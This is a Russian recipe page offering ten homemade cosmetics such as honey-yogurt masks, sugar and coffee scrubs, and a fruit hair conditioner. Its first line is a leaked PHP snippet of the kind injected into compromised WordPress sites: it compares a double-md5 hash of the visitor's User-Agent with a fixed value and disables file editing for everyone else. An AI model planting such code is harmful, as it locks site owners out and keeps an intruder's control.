if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 10 простых рецептов домашней косметики своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

10 простых рецептов домашней косметики своими руками

Для поддержания естественной красоты не обязательно тратить кучу денег на дорогостоящие салонные процедуры или брендовую косметику. Ведь существует и бесплатная косметика, которую можно приготовить своими руками из продуктов, лежащих в любом холодильнике.

Для под­дер­жа­ния есте­ствен­ной кра­со­ты не обя­за­тель­но тра­тить кучу денег на доро­го­сто­я­щие салон­ные про­це­ду­ры или брен­до­вую кос­ме­ти­ку. Ведь суще­ству­ет и бес­плат­ная кос­ме­ти­ка, кото­рую мож­но при­го­то­вить сво­и­ми рука­ми из про­дук­тов, лежа­щих в любом холодильнике.

1

Медово-йогуртная маска для лица

Сме­шай­те по 2 ст. л. гре­че­ско­го йогур­та и меда с 1 ч. л. мас­ла мин­да­ля. Нане­си­те на лицо полу­чен­ную смесь на 10 мин. и хоро­шо смой­те. Такая мас­ка бла­го­да­ря соче­та­нию высо­ко­пи­та­ю­щих про­дук­тов сде­ла­ет кожу увлаж­нен­ной, мяг­кой и бархатной.

Очищающая маска из папайи

Рас­тол­ки­те до одно­род­ной каши­цы 4 доль­ки папайи, добавь­те туда 2 ст. л. клас­си­че­ско­го йогур­та. После это­го вски­пя­ти­те кастрюль­ку воду, добавь­те в нее пол­ста­ка­на англий­ской соли и несколь­ко паке­ти­ков мят­но­го чая.

Рас­парь­те кожу лица над паром в тече­ниt 3‑х минут, затем нане­си­те мас­ку из йогур­та и папайи на лицо минут на 10–15, смойте.

Патчи на основе чая

Для вос­ста­нов­ле­ния устав­шей кожи вокруг глаз, сня­тия оте­ков, раз­гла­жи­ва­ния мор­щи­нок мож­но вос­поль­зо­вать­ся сле­ду­ю­щим рецептом.

Зава­ри­те в кипя­че­ной воде по 2 паке­ти­ка ромаш­ко­во­го и зеле­но­го чая, немно­го осту­ди­те и поло­жи­те паке­ти­ки с ромаш­кой на верх­ние веки, а с зеле­ным – на ниж­них. Через 10 мин. сни­ми­те и в кожу вокруг глаз акку­рат­но вотри­те смесь из масел жожо­ба и ши (по ½ ч. л.).

Лимонный скраб для губ

Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми отлич­но помо­жет в ухо­де за кожей губ, кото­рая так­же нуж­да­ет­ся в посто­ян­ном ухо­де. Нату­раль­ные скра­бы для губ отше­лу­ши­ва­ют омерт­вев­шие клет­ки и раз­гла­жи­ва­ют мел­кие трещинки.

3

Рецепт тако­го скра­ба прост: по ½ ч. л. меда и саха­ра сме­шать с соком чет­вер­ти лимо­на. Смесь нане­сти на губы, легонь­ко помас­си­ро­вать и смыть. После чего нане­сти увлаж­ня­ю­щий бальзам.

Сахарный скраб для тела

Еже­не­дель­но наша кожа тре­бу­ет очи­ще­ния от омерт­вев­ших кле­ток, в чем мы можем ей помочь с помо­щью само­дель­ных скра­бов. Кос­ме­ти­ка в домаш­них усло­ви­ях для начи­на­ю­щих не тре­бу­ет осо­бых затрат, поэто­му и сле­ду­ю­щий рецепт доволь­но прост в исполнении.

1 ста­кан трост­ни­ко­во­го саха­ра нуж­но соеди­нить с тре­тью частью ста­ка­на мас­ла коко­са и 10‑ю кап­ля­ми эфир­но­го розо­во­го мас­ла, нане­сти смесь на кожу все­го тела и слег­ка помассировать.

Антицеллюлитный кофейный скраб

Кофе явля­ет­ся неза­ме­ни­мым ингре­ди­ен­том любо­го анти­цел­люлит­но­го сред­ства за счет сво­ей спо­соб­но­сти под­тя­ги­вать кожу, раз­ру­шать жиро­вые отло­же­ния и бороть­ся с цел­люли­том. Имен­но поэто­му наша сле­ду­ю­щая бес­плат­ная кос­ме­ти­ка в лице анти­цел­люлит­но­го скра­ба будет содер­жать моло­тый кофе.

Возь­ми­те чет­верть чаш­ки гру­бо­го саха­ра и такое же коли­че­ство моло­то­го кофе, добавь­те туда 1 ст. л. мор­ской соли и 2 ст. л. мас­ла коко­са. Скраб готов к при­ме­не­нию и может хра­нить­ся в закры­той емко­сти до 2‑х месяцев.

Противовоспалительная маска из специй

Изба­вить­ся от вос­па­ле­ний на теле мож­но, исполь­зуя мас­ку для тела на осно­ве спе­ций. Кста­ти, уход за кожей лица так­же мож­но делать с добав­ле­ни­ем спе­ций в кос­ме­ти­че­ские средства.

Сме­шай­те ¼ ст. моло­то­го мускат­но­го оре­ха, риса, гвоз­ди­ки имби­ря и кори­цы, в смесь добавь­те несколь­ко капель воды. Нано­сить такую мас­ку сле­ду­ет тон­ким сло­ем не более чем на 15 минут.

Масляный увлажняющий крем

Для кожи, под­вер­жен­ной шелу­ше­нию и чрез­мер­ной сухо­сти мож­но помочь с помо­щью сле­ду­ю­ще­го рецеп­та домаш­ней косметики.

Пол­ста­ка­на мас­ла аво­ка­до и ши нуж­но рас­то­пить в кастрю­ле, осту­дить и сме­шать в неболь­шой емко­сти с 5–15 кап­ля­ми мас­ла лаван­ды, нано­сить после душа.

Клубничный скраб

Для ухо­да за огру­бев­шей кожей ног после суро­вой зимы тре­бу­ет­ся мно­го сил и уме­ния. Наи­луч­ший пилинг для этой зоны – клуб­нич­ный, так как кис­ло­ты, вхо­дя­щие в ее состав, отлич­но отше­лу­ши­ва­ют омерт­вев­шие клетки.

Гото­вит­ся скраб про­сто: 5 ягод клуб­ни­ки рас­те­реть с 1/2 ста­ка­на саха­ра и доба­вить пару ложек олив­ко­во­го масла.

Фруктовый кондиционер для волос

2

½ аво­ка­до, 1 банан и 1 ман­го нуж­но хоро­шень­ко измель­чить в блен­де­ре, сме­шать с несколь­ки­ми сто­ло­вы­ми лож­ка­ми коко­со­во­го мас­ла – кон­ди­ци­о­нер для послуш­ных рос­кош­ных волос готов.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!